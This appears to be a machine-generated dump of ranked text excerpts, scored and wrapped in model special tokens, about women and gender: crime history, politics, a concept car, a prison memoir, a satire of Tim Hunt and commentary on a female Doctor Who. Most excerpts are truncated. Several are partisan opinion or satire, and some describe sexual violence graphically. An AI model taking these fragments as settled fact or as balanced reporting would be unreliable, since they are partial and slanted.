we?”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 52; Score = 391168.0 +<|begin_of_text|>Robert St. Estephe–Gonzo Historian–is dedicated to uncovering the forgotten past of marginalizing men. “Gonzo journalism” is characterized as tending “to favor style over fact to achieve accuracy.” Yet history – especially “social history” – is written by ideologues who distort and bury facts in order to achieve an agenda. “Gonzo” writing is seen as unorthodox and surprising. Yet, in the 21st century subjectivity, distortion and outright lying in non-fiction writing is the norm. Fraud is the new orthodoxy. Consequently, integrity is the new “transgressive.” + +Welcome to the disruptive world of facts, the world of Gonzo History. + +•?• + +Acid throwing is in the news these days due to the prevalence of this crime in South Central Asia. Reported statistics show victims to be about 80% female. Statistics on the sex of the perpetrator are much harder to find (and have not been located by UHoM yet). The epidemic of acid attacks started, we are told, in the 1980s. These crimes are, every reasonable person would agree, are of the most cruel kind and are deserving of the most extreme condemnation. Yet the specialists who make an effort to publicize this horrible crime epidemic are classifying it as a “gender issue.” The term “gender” when used in such a way universally connotes “women,” specifically in the sense of “victimization of women by men.” Perhaps this classification accurately represents the proportion of each sex in the victim category, but it does not accurately disclose the fact that a huge number of the perpetrators are women, women who choose to commit atrocious crimes on other individuals. + +Let us try to overcome the confusion caused by the distorting lens of “gender” rhetoric by looking at a few cases remote in both place and time from those which are currently being, correctly, publicized. + +Acid attacks were in the past a common crime in the US and occurred in Europe as well. + +Since female criminality has been severely under-served by researchers ever since the beginning of criminology it is worthwhile to examine a sampling of such cases. The most overlooked category of criminal violence in terms of sex of perpetrator and sex of victim is, of course, female against female. + +The three cases of female acid attackers presented here, all occurring in the same city in the same year are each quite different: one perpetrator threw acid on another woman, one threw acid on a man and another who threw acid on herself +================================================================================ +Rank = 53; Score = 385024.0 +<|begin_of_text|>The Volvo YCC ("Your Concept Car")[1] was a concept car made by Volvo Cars presented at the 2004 Geneva Motor Show, with the stated goal of meeting the particular needs of female drivers. In order to do so, Volvo assembled a design team entirely made up of women, around October 2001. It was a major exercise in ergonomics from the perspective of a female driver. + +Those who were involved during the several stages of the project were: Maria Widell Christiansen, Eva-Lisa Andersson, Elna Holmberg, Maria Uggla, Camilla Palmertz, Cynthia Charwick, Anna Rosén, Lena Ekelund, and Tatiana Butovitsch Temm. + +On the outside the car looked, at first glance, like a mildly futuristic four seat coupé. On closer inspection, one could see that there was no hood, that is, no access panel permitting access to the car’s engine. Engine maintenance required taking out the whole front end of the car body, preferably in some establishment with the required space and equipment. This was not supposed to happen often, as the engine was designed to need an oil change only after 50,000 km (31,000 mi) and to automatically send a radio message to a garage a short time before any required maintenance. + +Filling the windshield washer tank was done by a capless ball valve, right next to the capless gas tank ball valve. Volvo surveys had found (among many other things) that female drivers considered caps to be a major nuisance. The car featured run-flat tires, like those of wheeled armoured vehicles, in order to be able to drive all the way to a garage after a puncture and thus avoid having to change a tire by the side of the road. + +Entry into the car was by the means of two gull-wing doors on the sides. The concept was a three door, four seat coupe design. It also had an upwards opening hatchback door giving access to the trunk and cargo area. + +All three doors were motorized for a sensor based “keyless” entry. Pressing on a single button on the keychain automatically opened the nearest door, making it easy for somebody holding bags of groceries or other sundries to get the things in the car without putting anything down. The interior was maximized for easy storage and good looks. + +All of the textile panels or textile parts such as the seat pads or the door sides could be removed easily to change the color schemes and vary textures. + +The +================================================================================ +Rank = 54; Score = 378880.0 +<|begin_of_text|>I am one of the many transgender women living in the Greater New Orleans area who have been profiled and arrested simply for being in the wrong place at the wrong time, with the wrong shade of skin, in the wrong body. Once inside the dreadfully corrupt Orleans Parish Prison (OPP), we are reduced to our genitals and become just another number. When those of us who present as female in gender enter a heteronormative male space where females are not allowed, we are ultimately dehumanized. We become not only property of the state, and of the city, but of cisgender male inmates. We are immediately seen as prey by the inmates who view femininity as weakness. + +Illustration by Charlie Poulson + +I was 21 years old when I was first arrested. I was out doing sex work, just trying to survive. The cop took me to jail, unlike the others who picked me up and threatened to take me in if I didn’t perform oral sex on them. Most trans women would agree the environment in prison is almost like a stage set for depression and suicide. A lot of girls like me don’t even like to stand out anymore because of the constant profiling, so we seek desperately to blend in. Dressing fiercely used to be such a glamorous, extravagant art but society has found a way to force us to blend in. As the saying goes “if they can tell, you’re going to jail!” + +That first time in jail was the scariest of all and possibly the time I became infected with HIV. For black trans women, this path is all too familiar. I have my assumption of how I contracted it, but there were honestly so many times I was in jail and participated in unprotected sex out of fear and necessity as a young woman that I can’t be sure. In order to preserve some safety and dignity, I always chose a man before one tried to impose his will on me. + +The first ten times I was arrested I had little to no family support, so if I wanted anything more than what little the state provided while I was inside, I had to use what seemed to be at the time my most valuable commodity: my youthful body. I became a prison concubine to career criminals who had been in and out of the prison system nearly their entire lives, many of whom had been with just about every young trans woman who came through the door on sex work charges. We often had shorter stays, creating a turnover rate that allowed the men who were facing serious charges to be with +================================================================================ +Rank = 55; Score = 376832.0 +<|begin_of_text|>I had the idea for this blog post while I was watching some interviews on YouTube. The videos of the Conan show stood out to me because many of them seem to be focused on sexual topics. To me, it looks like they were following the simple “sex sells” approach. Not that there’s something inherently wrong with this, it just appears that Conan uses it much more than other late-night show channels. + +This brought me to my main question. Are Conan videos more focused on sexual content than the ones of other late-night shows? I decided to compare its YouTube channel to the official channels of Jimmy Kimmel Live!, The Tonight Show Starring Jimmy Fallon, The Late Show with Stephen Colbert, and The Late Late Show with James Corden. + +The public YouTube API allowed me to download the information for all available 12,237 videos. To find out whether a video contains sexual content or not, I compared the video’s title and description against a word list (see below). If the title or description contains at least one of the words, the video will be rated as “contains sexual content”. On top of that, I also checked if the video titles contain names of persons to group the videos into three categories: female, male, and neutral. For example, interviews with actresses fall into the female category, whereas, monologs fall into the neutral category. + +The graph above shows that 17% of Conan videos in the female category contain sexual content which is 11% more than the Late Show with Stephen Colbert, the second place. We also can see that the share of Conan videos containing sexual content is twice as large in the female category than in the male category. These numbers confirm the hypothesis that the Conan YouTube channel focuses much more on sexual content than other late-night shows. The Tonight Show Starring Jimmy Fallon appears to be the YouTube channel with the cleanest video titles and descriptions. + +Bonus: The results left me wondering if suggestive titles help the channels to gain views. I created the following plot with the beanplot R package which shows us that only Conan seems to benefit from sexual video titles or descriptions. If you’re interested in the beanplot, you can find a detailed explanation here.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 56; Score = 376832.0 +<|begin_of_text|>MEPs have revealed they want boys to learn about traditionally ‘female’ activities and should be taught domestic work and care at school. + +The Brussels politicians said they want to stand against ‘sexist’ education by encouraging children to take an equal interest in all subjects ‘beyond gendered stereotypes’. + +They hope that girls will take up scientific and technical subjects while boys could take up activities such as cleaning the home. + +MEPs have revealed they want boys to learn about traditionally ‘female’ activities and should be taught domestic work and care at school + +Textbooks showing old-fashioned stereotypes about male and female roles would also be thrown out of schools, under the European Parliament’ proposals. + +The suggestions were made in the report on Empowering Girls Through Education from the Parliament’s FEMM Committee on Women’s Rights and Gender Equality, with MEPs approving the proposals by 408 to 236. + +The report says it 'encourages girls and boys in the education process to take an equal interest in all subjects, beyond gendered stereotypes, in particular as regards scientific and technical subjects, including boys’ learning about activities regarded as female, in areas such as domestic work and care’. + +The Brussels politicians said they want to stand against ‘sexist’ education by encouraging children to take an equal interest in all subjects ‘beyond gendered stereotypes’ + +Another point says that schools should be guided ‘to embrace a gender perspective and gender equality, and to ensure the elimination of stereotypes and sexist distortions that textbooks and teaching materials may include in their content.' + +It added: '[This will then] encourage them also to combat this sexism in literature, film, music, games, media, advertising and other areas that can contribute decisively to changing the attitudes, behaviour and identity of girls and boys’. + +Portuguese socialist MEP Liliana Rodrigues, who spearheaded the proposals, said: ‘We are still living in an unequal Europe…women continue to be a prime target for discrimination and violence. I believe that school plays a fundamental role in changing this. + +‘[We want to] create a school culture of gender equality, critically oversee the curricula and educational materials, ensure gender equality with regard to personal and professional decisions and improve the percentage of women in positions of responsibility.’ + +But Leading Labour Eurosceptic MP Kate Hoey told The Daily Express: ‘I have confidence in our nation’s ability to deal with educating our own children. It is time for the EU to stop wasting money on interfering in matters that are none of their business.’<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 57; Score = 376832.0 +<|begin_of_text|>It is time to move forward from women’s development to women-led development, Prime Minister Narendra Modi told the National Conference of Women Legislators in New Delhi on Sunday. + +“If a survey is done, then I am sure that women will be more successful than men when given an opportunity to work," he said. + +Last week, Modi proposed in Parliament that only female parliamentarians should speak in Parliament on 8 March—International Women’s Day. + +Currently, out of 543 MPs in the Lok Sabha, only 62 are women. However, this is the most on record in the lower house. In the Rajya Sabha, there are 31 women out of 245 MPs. + +The prime minister lauded the contribution of women in strengthening the nation. “A country is not made strong by its infrastructure. Every citizen of India strengthens the nation and mothers give strength to these citizens. It is the mothers who have been contributing to nation building for years," he said. + +Modi also appealed to female MPs to embrace technology to connect with their respective constituencies. “Women adapt to technology much easier than men. I have received so many enriching thoughts and views through the Narendra Modi app and MyGov.in. All of you can also use technology similarly to stay well-informed about your own areas," he said. Modi suggested that e-platforms be created for female MPs of the Lok Sabha and Rajya Sabha. + +While appreciating their ability to multitask, the prime minister said that female legislators must further the cause of women’s empowerment in their respective constituencies by holding similar conferences with local women leaders. + +Though analysts see Modi’s address as a progressive step, they feel that it is more important to see how his words translate into action. + +“Such a statement coming from the prime minister is a big thing and I welcome this new pitch to women’s empowerment, but is it being actioned out? For instance, the Beti Bachao Beti Padhao scheme was launched quite a while ago and we are yet to see progress being made. Let this not be a government of mere slogans, but a government that also works towards fulfilling what it says," said New Delhi-based political analyst Manisha Priyam. + +In his 15 August address last year, Modi spoke about the need to acknowledge the gender bias in Indian society and condemned the increasing incidence of rape in the country. + +“In every home, parents ask daughters lots of questions as to where she is going, when will she return, and ask her to inform them when she reaches her destination. But have +================================================================================ +Rank = 58; Score = 374784.0 +<|begin_of_text|>Afghanistan worst place in the world for women, but India in top five + +Targeted violence against female public officials, dismal healthcare and desperate poverty make Afghanistan the world's most dangerous country in which to be born a woman, according to a global survey released on Wednesday. + +The Democratic Republic of the Congo (DRC), Pakistan, India and Somalia feature in descending order after Afghanistan in the list of the five worst states, the poll among gender experts shows. + +The appearance of India, a country rapidly developing into an economic super-power, was unexpected. It is ranked as extremely hazardous because of the subcontinent's high level of female infanticide and sex trafficking. + +Others were less surprised to be on the list. Informed about her country's inclusion, Somalia's women's minister, Maryan Qasim, responded: "I thought Somalia would be first on the list, not fifth." + +The survey has been compiled by the Thomson Reuters Foundation to mark the launch of a website, TrustLaw Woman, aimed at providing free legal advice for women's groups around the world. + +High maternal mortality rates, limited access to doctors and a "near total lack of economic rights" render Afghanistan such a threat to its female inhabitants. "Continuing conflict, Nato airstrikes and cultural practices combine to make Afghanistan a very dangerous place for women," said Antonella Notari, head of Women Change Makers, a group that supports women social entrepreneurs around the world. + +"Women who do attempt to speak out or take on public roles that challenge ingrained gender stereotypes of what is acceptable for women to do or not, such as working as policewomen or news broadcasters, are often intimidated or killed." + +The "staggering levels of sexual violence" in the lawless east of the DRC account for its second place in the list. One recent US study claimed that more than 400,000 women are raped there each year. The UN has called Congo the rape capital of the world. + +"Rights activists say militia groups and soldiers target all ages, including girls as young as three and elderly women," the survey reports, "They are gang raped, raped with bayonets and some have guns shot into their vaginas." + +Pakistan is ranked third on the basis of cultural, tribal and religious practices harmful to women. "These include acid attacks, child and forced marriage and punishment or retribution by stoning or other physical abuse," the poll finds. + +Divya Bajpai, reproductive health adviser at the International HIV/Aids Alliance, added: "Pakistan has some +================================================================================ +Rank = 59; Score = 368640.0 +<|begin_of_text|>In an alleged attempt to boost recruitment, former Miami police chief Manuel Orosa allowed a local television production company to film a trailer for a proposed reality show called ‘Miami Blue: The Real Miami Vice’. Filmed in late 2013 and just now coming to light, the trailer features luxury condos, boats, big drug busts, and of course, scantily clad female Miami police officers. + +Union president Lt. Javier Ortiz, who is shown in the video, told the Miami Herald that “when I asked who was taking the video, Orosa told me it was for recruitment purposes.” According to Orosa however, it was never intended for recruitment purposes, but rather for a $40,000 donation to the Police Athletic League, should the show get picked up. But the show never got picked up by a network, and now the promotional trailer is floating around the internet for all to see. + +Current Miami police chief Rodolfo Llanes, who claims to have only discovered its existence on Monday, condemned the video for objectifying female officers and said he was going to speak with an attorney.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 60; Score = 368640.0 +<|begin_of_text|>Elizabeth Blackwell (February 3, 1821 – May 31, 1910) was a British physician, notable as the first woman to receive a medical degree in the United States, and the first woman on the Medical Register of the General Medical Council.[1] Elizabeth Blackwell played an important role in both the United States and the United Kingdom as a social and moral reformer. She acted as a pioneer in promoting the education of women in medicine. Elizabeth Blackwell's contributions remain celebrated through an Elizabeth Blackwell medal that is awarded to one woman every year who has added to the cause of promoting women in medicine.[1] Furthermore, Hobart and William Smith College recently created a statue on their campus honoring Elizabeth Blackwell.[2] + +Elizabeth Blackwell was initially uninterested in a career in medicine especially after her schoolteacher brought in a bull's eye to use as a teaching tool.[1] Therefore, she became a schoolteacher in order to support her family. This occupation was seen as suitable for women during the 1800s, however, being a schoolteacher did not interest Blackwell. Blackwell's motivation to go into medicine came after her friend fell ill and suggested that if a female doctor had cared for her, she might not have suffered so much.[1] Blackwell began to apply to medical schools, however, she endured a lot of prejudice due to her gender. She was rejected from all the medical schools she applied to except Geneva Medical College. In 1847 Blackwell became the first woman to attend medical school in the United States.[1] + +Elizabeth Blackwell had her inaugural thesis on typhoid fever published in the Buffalo Medical Journal right after she graduated from college in 1849.[3] This article was the first medical article published by a female student from the United States. Her article portrayed a strong sense of empathy and sensitivity to human suffering as well as a strong desire for social and economic justice.[3] This point of view was considered very feminine.[3] Furthermore, in 1857, Blackwell also opened up the New York Infirmary for Women and Children with her sister Emily. She also gave lectures to women about the importance of educating girls.[2] + +Early life [ edit ] + +Elizabeth was born on February 3, 1821, in Bristol, England, to Samuel Blackwell, who was a sugar refiner, and his wife Hannah (Lane) Blackwell.[4] She had two older siblings, Anna and Marian, and would eventually have six younger siblings: +================================================================================ +Rank = 61; Score = 366592.0 +<|begin_of_text|>I’m a female scientist, and I agree with Tim Hunt. + +Allie Rubin Blocked Unblock Follow Following Jun 13, 2015 + +Nobel Prize winner Sir Tim Hunt recently caused a stir when he argued that male and female scientists should work independently, because women are a distraction to men in the lab. At a conference, he was quoted as saying, “Let me tell you about my trouble with girls… three things happen when they are in the lab… You fall in love with them, they fall in love with you and when you criticize them, they cry.” + +As improbable as it might sound, I am a female scientist, and I agree with Tim Hunt. + +First of all, Sir Tim’s comments are based on his personal experiences, and are therefore incontrovertible. Three hundred and fifty years ago, Isaac Newton saw an apple fall and decided that gravity existed. Three weeks ago, Tim Hunt saw a woman cry and decided that all women are unfit to be scientists. Science is based on observations, which are the same thing as universal proof. Even I know that, and I’m just a woman whose brain is filled to capacity with yoga poses and recipes for gluten-free organic soap. Once, I was lured into a trap in the woods because I followed a trail of Sex and the City DVDs for three miles into a covered pit. Do you really think I could do something as complicated as thinking about science? + +Second, Tim Hunt is correct in asserting that women are distracting to men in a lab setting, which greatly affects their productivity. Last month, my labmates and I had to burn our female coworker at the stake for witchcraft because we saw her holding an unwrapped tampon. Between building the stake, lighting an adequate fire, and waiting for her to die, we lost an entire day that we could otherwise have spent working. I make every effort to not distract my male colleagues; sometimes I have to work on my astrology charts from home when I’m menstruating or have leprosy, just so I can let the men in my lab focus on doing real science. It’s a small sacrifice I make that keeps morale in the lab way up. + +Tim Hunt also mentions that men and women are constantly falling in love with each other within the lab. This is true; I used to identify as homosexual before working with a group of bearded men and a set of phallic pipettes turned me straight. Once that happened, I couldn’t stop falling in love with every man I met. One time I fell +================================================================================ +Rank = 62; Score = 362496.0 +<|begin_of_text|>This same bus was seen running through the streets of Madrid with its blunter message that “boys have penises and girls have vaginas. Don’t be deceived”This advertisement for intolerance, which belies intelligence on this subject is now in Manhattan parked in front of the UN building and says something slightly different in English:“Its biology…Boys are boys and always will be and girls are girls and always will be. You can’t change sex. Respect all”Never mind that message is written by people who understand nothing and most importantly are confusing gender identity with sexual organs and I won’t surprise you by telling you it has been funded by 3 right wing conservative groups one of whom is called the National Organization for Marriage.Of the Spanish version, one Madrid councilman declared it the “bus of shame,” and city officials ordered it removed from the streets for violating a traffic law restricting advertising on private vehicles.“We need a discussion about how to respect everyone,” says Joseph Grabowski who is a representative for one of the groups. But he also claimed that being transgender is a “disorder” and that a respectful discussion does not extend to recognizing a transgender person’s gender identity in public settings. (The American Psychiatric Association does not classify being transgender as a mental disorder.) He also added, “They can live that out privately.”Not only are these groups profoundly ignorant of science and reality but they also represent a dangerous new backlash trend among the “earth is flat crowd”; the very same ones that occupy the Bible belt in the United States and voted for Donald Trump. They can also be found in every country in the world usually also denying climate change, women’s rights and decrying homosexuality as a sin.Let’s hope that their message does not receive a receptive ear and enough people take exception in order to educate the sponsors although I suspect that wouldn’t have much effect on those who've already drunk the Kool-Aid.Is it not the least bit ironic that the "respect all" in their message doesn't ring a bell of contradiction in their minds?<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 63; Score = 358400.0 +<|begin_of_text|>Being feminist means being vegan. You can’t be a true feminist if you’re eating meat. + +I read this comment on Facebook and it hit a nerve with me. My first reaction was, “Why should people be telling others what to eat and what not to eat?” The more I thought about it, the more it bothered me for many reasons. + +The argument is that being a feminist means addressing all forms of oppression, including oppression of animals. The animal agricultural industry exploits animals. Female animals are forced to breed through artificial or manual insemination. Their youngs are taken from them prematurely. Female chickens are debeaked and grow to be too big for their legs to carry them. Pigs are penned in cages too small for them to move. The theory is that exploitation of the female animal reproductive system is very relevant to feminists fighting against the patriarchy and fighting for human female reproductive rights. Oppression of animals should intersect with oppression of women. + +When vegans or feminists make statements like mentioned above, it can come off as very Western-centric, classist, and elitist. + +I’ve never felt like going vegan or vegetarian, not because I didn’t understand the plight for animal rights, but because it is something I can’t identify with. + +First and most importantly, Hmong culture is a very big part of my identity, and food is Hmong culture. We (family and friends) gather around food. Food is served at birthday parties, religious ceremonies, celebrations, and even during short visits to family. Food is part of family life. + +So, why not substitute meat ingredients with vegan products? + +Our ancestors cultivated the lands of Laos, Vietnam, and China for farming and livestock. We brought our culture with us when we immigrated to the US as refugees of war after the Vietnam War. + +Religious ceremonies, like hu plig (soul calling), require eggs and the sacrifice of chickens and roosters. Other ceremonies involve sacrificial cows, pigs, and sheep/goats. We need chicken’s blood and feathers for the New Year to create a new shrine for our xwm kab. So, how should we perform or practice our religion if we go vegan? What about the cultural custom of dieting only on boiled chicken and herbs 30 days postpartum? + +Meat has always been very precious to the Hmong. We don’t waste anything, so the dishes we cook during feasts are from the meat of the animals we sacrifice for religious ceremonies. Food we eat throughout the year are leftover meat from the same animals. + +V +================================================================================ +Rank = 64; Score = 358400.0 +<|begin_of_text|>Tides roll in, tides roll out. It’s not just the ocean. Elections can work the same way. + +Four years ago, Republicans had a smashing campaign season, seizing control of the House and piling up victories in Senate and gubernatorial races from sea to shining sea. Some of those swept into office were buoyed by the tea party-fueled wave. + +Four years later, many governors now have to defend their seats under less favorable conditions. + +That, succinctly, explains the dynamic in this year’s gubernatorial contests, which is more broadly discussed in this article focused on Republican Gov. Sam Brownback’s struggle in deeply red Kansas. + +Of the 36 governors races on the ballot this November, 22 are for seats held by Republicans and 14 by Democrats, numbers that work in the Democrats’ favor in contrast to their struggle in House and Senate races. + +Here are some gubernatorial contests to watch, based on interviews with nonpartisan analysts Jennifer E. Duffy of the Cook Political Report and Nathan Gonzales of the Rothenberg Political Report, as well as campaign strategists for the two major parties. + +REPUBLICAN SEATS THAT DEMOCRATS COULD FLIP: + +Florida: Gov. Rick Scott barely won election in 2010 and voters haven't seemed to warm to the former healthcare executive. Perhaps the best thing Scott has going for him is his opponent, Republican-turned-independent-turned-Democrat Charlie Crist, whose partisan perambulations left him with plenty of critics on all sides. + +Kansas: Brownback has pursued an aggressively conservative agenda, highlighted by a record cut in the state’s income tax, which has sent revenues plunging and many moderate Republicans running into the arms of his Democratic opponent, House Minority Leader Paul Davis. Brownback is trying to tie Davis to President Obama, who is overwhelmingly unpopular in the state despite his family roots. (Obama’s mother was a Kansan.) + +Georgia: Gov. Nathan Deal has been dogged by an ethics scandal and his bungled response to a freak January snowstorm, among other missteps. The Democratic candidate is Jason Carter, the grandson of former President Jimmy Carter, who has been a strong fundraiser and may also benefit from heavy Democratic spending on behalf of U.S. Senate candidate Michelle Nunn, daughter of former Sen. Sam Nunn, who offers the party a rare pickup opportunity against businessman David Perdue. + +Maine: Gov. Paul LePage barely won election in 2010 in a three-way race and has alienated a lot of people since, +================================================================================ +Rank = 65; Score = 356352.0 +<|begin_of_text|>Jodie Whittaker: what an inspired choice for the new Doctor. Not only is she a very fine actress, whether she’s playing stricken with grief, as she did in Broadchurch, or a comedically exasperated trainee nurse stressed out by aliens and chavs in the wonderful little film Attack the Block. She also exudes that quality every good Doctor needs: the everyman touch. Or everyperson touch. The sense that while this creature might be a Time Lord with two hearts and a police-box time machine, he — now she — is nonetheless like us. Special but connectable. Otherworldly but worldly. Whittaker can do that. I think she’ll be brilliant. + +But my joy at seeing an actress I admire land a coveted role has been dampened by the crazy reaction to the news. You’d be forgiven for thinking that making the thirteenth Doctor a woman is on a par with women getting the vote. Twitter has evaporated into a paroxysm of joy. This will transform life for the female of the species, apparently. We cannot underestimate ‘how important a female Doctor is’, says the Huffington Post. This casting helps ‘break the glass ceiling’, says a self-congratulatory BBC (inflaming suspicion that it chose Whittaker because she’s a woman rather than because she’s good at her job). Whittaker will inject ‘girl power [into] space and time’, says one observer. + +Writing in the Guardian, the sixth Doctor, Colin Baker, says Whittaker’s arrival reverses ‘the 